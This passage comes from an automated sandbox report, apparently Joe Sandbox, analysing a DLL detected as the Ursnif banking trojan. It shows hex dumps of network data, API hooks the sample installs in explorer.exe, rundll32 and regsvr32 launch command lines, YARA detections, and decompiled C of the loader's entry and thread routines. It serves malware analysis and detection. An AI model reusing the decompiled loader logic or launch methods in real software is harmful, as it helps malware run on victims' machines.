                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC90INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 04 04 04 04 04 04 04 05 05 04 06 06 06 06 06 09 08 07 07 08 09 0d 0a 0a 0a 0a 0a 0d 14 0d 0f 0d 0d 0f 0d 14 12 16 12 11 12 16 12 20 19 17 17 19 20 25 1f 1e 1f 25 2d 29 29 2d 39 36 39 4b 4b 64 01 0a 0a 0a 0a 0a 0a 0b 0c 0c 0b 0f 10 0e 10 0f 16 14 13 13 14 16 22 18 1a 18 1a 18 22 33 20 25 20 20 25 20 33 2d 37 2c 29 2c 37 2d 51 40 38 38 40 51 5e 4f 4a 4f 5e 71 65 65 71 8f 88 8f bb bb fb ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 05 06 07 04 08 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 04 03 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f8 fc 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Data Ascii: JFIF %%-))-969KKd""3 % % 3-7,),7-Q@88@Q^OJO^qeeq73
                                                              2021-10-20 13:08:56 UTC93INData Raw: b4 0b 74 bb 51 74 c6 1e 06 8f a8 8c e4 93 7d 1d 58 b3 21 7f 65 0d 26 33 f5 e3 17 0e 18 6c 63 05 60 96 45 67 11 90 2f 18 c8 47 99 b9 5f 47 e0 f1 9d f1 15 9b b9 52 46 55 1a c3 05 d9 3b 51 8b 27 13 2b 95 16 90 4c 17 6e 2a 92 25 8d 6d b3 19 34 4e 24 63 4b 44 18 4e cf f4 ca 7e a0 98 4c 45 1c 10 c7 45 42 18 ec d1 44 8e a6 0c 38 ca 3c 11 7d 20 ba 84 51 8b 39 69 a2 2c f1 3b 45 ea c7 17 3f 6d 82 65 10 4d 4c bb 1d ab 7e 56 16 79 89 fb 9c 49 61 a5 c8 db 4f 05 c2 8e 11 59 c3 bd 3d 88 6a 28 f5 6c 08 69 bb 47 49 09 cf 24 ce 80 b3 76 c7 08 db cd e2 25 c4 0c eb 58 d5 e6 84 73 7e 33 be 22 b3 77 2a 11 a4 36 99 44 3d 49 b3 46 c8 b3 48 1d 16 62 01 29 98 8b 6c a1 5d c7 53 a1 d5 55 8b 85 8e 85 0c 16 3c c5 97 b5 81 18 9c 04 fb 2c ac 59 5d 14 4a 9b 87 2c dc 34 57 eb 19 aa d9 63
                                                              Data Ascii: tQt}X!e&3lc`Eg/G_GRFU;Q'+Ln*%m4N$cKDN~LEEBD8<} Q9i,;E?meML~VyIaOY=j(liGI$v%Xs~3"w*6D=IFHb)l]SU<,Y]J,4Wc
                                                              2021-10-20 13:08:56 UTC95INData Raw: 3c 34 b1 8a 62 7f 10 fb 52 35 75 e2 55 07 b3 58 38 b0 38 88 06 5a 3b c9 fe 99 ac 97 ce 9b 77 60 14 1e f5 91 f3 0c 7d eb 0a f1 5d 8e 59 52 6b 34 fe 54 ad 5c 8f 82 da bd b2 5d 5a 6f 65 da 9b 17 8f 89 6c e0 f2 24 14 91 b1 00 74 5e 30 85 24 7f 92 a7 8e 2c 93 59 20 21 a8 d0 f6 02 be 4e b1 09 d5 ea 5c f2 bf 07 07 d9 71 42 f9 91 15 06 db a7 b0 c9 e5 00 3a d7 04 6c fd 68 9c 81 0e e0 ca 0e 43 6a af 7d c6 33 0e f8 58 dd dd 60 97 be 72 fd 3a 61 91 50 f1 44 e4 47 7c 68 7a 58 cf 25 8a f0 b7 8f 1f 24 e6 94 01 1c b5 d7 67 5f f9 c5 5d ec dc f3 ff 00 78 8c d0 b0 36 6a fb f1 8f aa 0c 88 c4 fd e0 14 7a d6 4f 22 4a e1 92 eb 68 07 f8 fc 9d 70 2f ac 95 57 8f a4 6e 3d 3a 0c 86 25 8d d9 cf 3b 50 d1 fe 18 57 ce 96 15 e2 8b 33 1a f6 e3 00 55 e1 46 3b 18 d4 57 52 4e 2b 27 5a 3c 8f
                                                              Data Ascii: <4bR5uUX88Z;w`}]YRk4T\]Zoel$t^0$,Y !N\qB:lhCj}3X`r:aPDG|hzX%$g_]x6jzO"Jhp/Wn=:%;PW3UF;WRN+'Z<
                                                              2021-10-20 13:08:56 UTC97INData Raw: b8 8c d0 03 b8 7c 88 0f 71 20 54 7e f0 a8 fd e1 51 7b c2 a2 f7 c5 45 ef 0a 8b de 15 1f bc 2b a3 b6 ed 24 6f 20 b1 96 73 e1 0a 10 e0 ef 03 82 9f 38 15 6f 7a b0 38 4f 09 b7 24 c5 21 c0 24 a1 3c c0 27 1f 22 a8 ef 27 14 8c 4f 98 30 3f d9 7a 66 fb e3 b7 89 71 7f ad 4c b7 02 57 8a 46 44 89 d6 77 08 ae 3b 5b 8b a8 e1 81 57 f0 dc 5b 42 66 f0 a7 be 91 60 95 46 3b 3d 96 18 70 4f 2a 9a d9 52 e5 91 ae 1e 70 f1 b0 39 2a 84 b8 3b 79 60 1f 3d 5f 6a f7 f1 8e b6 e2 00 ab 05 ad bc 25 49 24 bc 4a 49 3f 77 89 cd 5f ea 46 08 52 e6 e0 5a bd 82 08 d6 49 0a 84 63 70 d1 e4 76 0a f0 ed 02 38 d7 49 59 0a 70 8c cb a4 80 1f d4 56 e7 38 ad 71 e2 53 92 24 bd b0 4e c8 f5 ad cd 74 aa 67 b7 b8 8c df 5b de 5d 58 24 38 38 2d 10 29 2e fc 7d d7 ad 52 3b b4 95 99 e0 95 2d 1b a8 8c b7 61 16 4e
                                                              Data Ascii: |q T~Q{E+$o s8oz8O$!$<'"'O0?zfqLWFDw;[W[Bf`F;=pO*Rp9*;y`=_j%I$JI?w_FRZIcpv8IYpV8qS$Ntg[]X$88-).}R;-aN
                                                              2021-10-20 13:08:56 UTC99INData Raw: 23 2f 46 ad 06 3f d4 93 c5 f4 cd f7 c7 6f 97 5f d4 6c e6 2e 23 ba b4 b0 96 68 5c a1 2a c0 3a 82 0e 0d 74 8e 15 8f cf 2e 97 72 b8 5c fd 93 b0 d7 4a a5 bb ea b1 14 36 fa 3d e1 8c c8 41 c1 9a 46 8f 82 8a d5 e2 95 62 0e c1 f4 ab cd ea d1 b0 40 31 d5 f9 d4 55 cd 98 70 a3 6c f6 57 51 f1 c6 42 1c c6 06 4d 40 b0 fc cb 64 8b 24 c9 22 23 48 b3 cc c5 01 75 01 88 04 66 ac 97 cd 80 48 ff 00 c5 46 10 48 d2 5d 75 2a 58 ba 81 85 4d d8 e1 c4 e4 d5 ac 60 76 b7 c8 4a 72 ef 04 56 c9 73 b9 1e 28 e4 3b 09 f6 a5 75 92 07 ea d5 e2 47 da e4 fd b6 20 70 5c 56 9f 65 0c 3a a0 96 0e b2 e1 23 90 e2 34 8f 0a 92 10 6b 40 80 49 b4 22 4d 7f 6e ac 30 3d 6d e7 ae 8d 89 d3 60 de 9a 9d b9 60 be 7c f6 eb a3 d8 42 42 e6 fe 01 ff 00 b5 74 75 59 90 f6 7e 71 b7 19 03 da f5 d1 af 24 32 8f 9c ed 7f
                                                              Data Ascii: #/F?o_l.#h\*:t.r\J6=AFb@1UplWQBM@d$"#HufHFH]u*XM`vJrVs(;uG p\Ve:#4k@I"Mn0=m``|BBtuY~q$2


                                                              Code Manipulations

                                                              User Modules

                                                              Hook Summary

                                                              Function NameHook TypeActive in Processes
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                              CreateProcessAsUserWEATexplorer.exe
                                                              CreateProcessAsUserWINLINEexplorer.exe
                                                              CreateProcessWEATexplorer.exe
                                                              CreateProcessWINLINEexplorer.exe
                                                              CreateProcessAEATexplorer.exe
                                                              CreateProcessAINLINEexplorer.exe

                                                              Processes

                                                              Process: explorer.exe, Module: WININET.dll
                                                              Function NameHook TypeNew Data
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT66CA300
                                                              Process: explorer.exe, Module: user32.dll
                                                              Function NameHook TypeNew Data
                                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT66CA300
                                                              Process: explorer.exe, Module: KERNEL32.DLL
                                                              Function NameHook TypeNew Data
                                                              CreateProcessAsUserWEAT7FFA9B33521C
                                                              CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                              CreateProcessWEAT7FFA9B335200
                                                              CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                              CreateProcessAEAT7FFA9B33520E
                                                              CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: loaddll32.exe PID: 2908 Parent PID: 5980

                                                              General

                                                              Start time:15:08:24
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\System32\loaddll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
                                                              Imagebase:0x12e0000
                                                              File size:893440 bytes
                                                              MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Analysis Process: cmd.exe PID: 5032 Parent PID: 2908

                                                              General

                                                              Start time:15:08:25
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                                                              Imagebase:0x150000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: regsvr32.exe PID: 1368 Parent PID: 2908

                                                              General

                                                              Start time:15:08:25
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
                                                              Imagebase:0x1070000
                                                              File size:20992 bytes
                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: rundll32.exe PID: 4892 Parent PID: 5032

                                                              General

                                                              Start time:15:08:25
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                                                              Imagebase:0xa20000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: iexplore.exe PID: 2376 Parent PID: 2908

                                                              General

                                                              Start time:15:08:26
                                                              Start date:20/10/2021
                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                              Imagebase:0x7ff751890000
                                                              File size:823560 bytes
                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: rundll32.exe PID: 4908 Parent PID: 2908

                                                              General

                                                              Start time:15:08:26
                                                              Start date:20/10/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
                                                              Imagebase:0xa20000
                                                              File size:61952 bytes
                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              Chronological Activities

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >

                                                                Analysis Process: loaddll32.exe PID: 2908 Parent PID: 5980 loaddll32.exeCOMMON

                                                                Executed Functions

                                                                Function 10001540, Relevance: 13.6, APIs: 9, Instructions: 120sleepnativesynchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 83%
                                                                			E10001540(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E10001EE5();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E10001B5A(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E1000167E(_t57);
						}
					} while (_v8 != 0);
					_t27 = E10001B6F(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E10001FB2(E1000169A,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E10001402(_t53,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x10004138 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E10001B5A(_t60 + _t19);
				 *0x10004138 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E1000167E(_t52);
				goto L18;
			}
























                                                                0x10001546
                                                                0x1000154b
                                                                0x10001550
                                                                0x1000167b
                                                                0x1000167b
                                                                0x10001559
                                                                0x10001559
                                                                0x1000155d
                                                                0x10001560
                                                                0x10001561
                                                                0x10001567
                                                                0x1000156b
                                                                0x100015a2
                                                                0x1000156d
                                                                0x10001575
                                                                0x1000157b
                                                                0x1000157d
                                                                0x10001582
                                                                0x10001588
                                                                0x1000158a
                                                                0x1000158a
                                                                0x10001591
                                                                0x10001597
                                                                0x10001597
                                                                0x1000159b
                                                                0x1000159b
                                                                0x100015a9
                                                                0x100015b0
                                                                0x100015b9
                                                                0x100015bc
                                                                0x100015c2
                                                                0x100015c5
                                                                0x100015ce
                                                                0x10001677
                                                                0x00000000
                                                                0x10001679
                                                                0x100015d7
                                                                0x10001628
                                                                0x10001628
                                                                0x1000163e
                                                                0x10001642
                                                                0x1000166a
                                                                0x10001644
                                                                0x10001647
                                                                0x1000164d
                                                                0x10001652
                                                                0x10001659
                                                                0x10001659
                                                                0x10001660
                                                                0x10001660
                                                                0x1000166d
                                                                0x10001673
                                                                0x10001675
                                                                0x10001675
                                                                0x00000000
                                                                0x10001673
                                                                0x100015e4
                                                                0x10001622
                                                                0x00000000
                                                                0x10001622
                                                                0x100015e6
                                                                0x100015eb
                                                                0x100015f2
                                                                0x100015f4
                                                                0x100015f8
                                                                0x1000161a
                                                                0x1000161a
                                                                0x00000000
                                                                0x1000161a
                                                                0x100015fa
                                                                0x100015ff
                                                                0x10001604
                                                                0x1000160b
                                                                0x00000000
                                                                0x00000000
                                                                0x10001610
                                                                0x10001613
                                                                0x00000000

                                                                APIs
                                                                  • Part of subcall function 10001EE5: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                                                  • Part of subcall function 10001EE5: GetVersion.KERNEL32 ref: 10001F03
                                                                  • Part of subcall function 10001EE5: GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                                                  • Part of subcall function 10001EE5: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,751463F0,00000000), ref: 10001B66
                                                                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 10001575
                                                                • Sleep.KERNELBASE(00000000,00000000,00000030,751463F0,00000000), ref: 100015BC
                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100015F2
                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001610
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,1000169A,?,00000000), ref: 10001647
                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001659
                                                                • CloseHandle.KERNEL32(00000000), ref: 10001660
                                                                • GetLastError.KERNEL32(1000169A,?,00000000), ref: 10001668
                                                                • GetLastError.KERNEL32 ref: 10001675
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                • String ID:
                                                                • API String ID: 3479304935-0
                                                                • Opcode ID: 03e72af39cae86b366e05527bfd586aa9639cb38a2ce4877cc9b3c3daefd0529
                                                                • Instruction ID: 285dab0012166d7ca4fd78fd081d31803307da6268f270452850b2542231148d
                                                                • Opcode Fuzzy Hash: 03e72af39cae86b366e05527bfd586aa9639cb38a2ce4877cc9b3c3daefd0529
                                                                • Instruction Fuzzy Hash: E231BF75901626ABF711DFA48C94ADF7BECEF442E5F154126F901E7148EB31DE408BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1000188F, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E10001FB2(E10001CE7, E10001C93(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                0x10001892
                                                                0x1000189e
                                                                0x100018a0
                                                                0x100018a3
                                                                0x10001919
                                                                0x1000191f
                                                                0x10001921
                                                                0x10001923
                                                                0x10001929
                                                                0x1000192b
                                                                0x10001930
                                                                0x10001933
                                                                0x1000193e
                                                                0x10001940
                                                                0x00000000
                                                                0x00000000
                                                                0x10001942
                                                                0x10001945
                                                                0x10001947
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10001947
                                                                0x1000194f
                                                                0x1000194f
                                                                0x1000195b
                                                                0x1000195b
                                                                0x100018a5
                                                                0x100018a6
                                                                0x100018c6
                                                                0x100018cc
                                                                0x100018d1
                                                                0x100018d3
                                                                0x1000190f
                                                                0x1000190f
                                                                0x100018d5
                                                                0x100018dd
                                                                0x100018e4
                                                                0x100018ee
                                                                0x100018fa
                                                                0x100018ff
                                                                0x10001906
                                                                0x1000190b
                                                                0x00000000
                                                                0x1000190b
                                                                0x10001906
                                                                0x100018d3
                                                                0x100018a6
                                                                0x10001968

                                                                APIs
                                                                • InterlockedIncrement.KERNEL32(10004108), ref: 100018B1
                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100018C6
                                                                  • Part of subcall function 10001FB2: CreateThread.KERNEL32 ref: 10001FC9
                                                                  • Part of subcall function 10001FB2: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                                                  • Part of subcall function 10001FB2: GetLastError.KERNEL32(00000000), ref: 10001FE9
                                                                  • Part of subcall function 10001FB2: TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                                                  • Part of subcall function 10001FB2: CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                                                  • Part of subcall function 10001FB2: SetLastError.KERNEL32(00000000), ref: 10002003
                                                                • InterlockedDecrement.KERNEL32(10004108), ref: 10001919
                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 10001933
                                                                • CloseHandle.KERNEL32 ref: 1000194F
                                                                • HeapDestroy.KERNEL32 ref: 1000195B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
